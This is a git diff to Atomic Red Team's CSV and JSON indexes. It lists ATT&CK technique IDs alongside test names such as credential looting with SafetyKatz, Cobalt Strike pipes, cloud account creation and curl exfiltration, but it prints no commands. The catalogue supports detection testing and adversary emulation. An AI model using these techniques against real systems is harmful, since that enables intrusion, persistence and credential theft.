Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/azure-ad-index.csv b/atomics/Indexes/Indexes-CSV/azure-ad-index.csv
index 6145c358..f8e69d04 100644
--- a/atomics/Indexes/Indexes-CSV/azure-ad-index.csv
+++ b/atomics/Indexes/Indexes-CSV/azure-ad-index.csv
@@ -7,6 +7,8 @@ defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD
 privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
+persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
 persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
 persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
 persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
diff --git a/atomics/Indexes/Indexes-CSV/iaas-index.csv b/atomics/Indexes/Indexes-CSV/iaas-index.csv
index 220b4772..57ff9cdd 100644
--- a/atomics/Indexes/Indexes-CSV/iaas-index.csv
+++ b/atomics/Indexes/Indexes-CSV/iaas-index.csv
@@ -4,6 +4,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
@@ -15,8 +16,11 @@ persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to
 persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
 persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
 persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
 collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
 collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 05a2dbd2..ddf56fc2 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -121,6 +121,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
 defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
@@ -441,6 +442,7 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
@@ -451,8 +453,11 @@ defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer S
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -633,6 +638,7 @@ privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Sid
 privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -640,8 +646,11 @@ privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -732,6 +741,11 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scrip
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
 execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
+execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
+execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
+execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
+execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
+execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -860,6 +874,8 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
 persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
+persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
+persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
@@ -915,13 +931,17 @@ persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Window
 persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
 persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
 persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -1171,6 +1191,7 @@ discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b67
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
 discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
+discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
 discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
@@ -1272,6 +1293,7 @@ discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,
 discovery,T1082,System Information Discovery,24,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
 discovery,T1082,System Information Discovery,25,System Information Discovery with WMIC,8851b73a-3624-4bf7-8704-aa312411565c,command_prompt
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
+discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
 discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
 discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
 discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
@@ -1494,10 +1516,14 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 0f950577..1e26228b 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -37,6 +37,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 00b7845b..75a4128e 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -27,6 +27,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
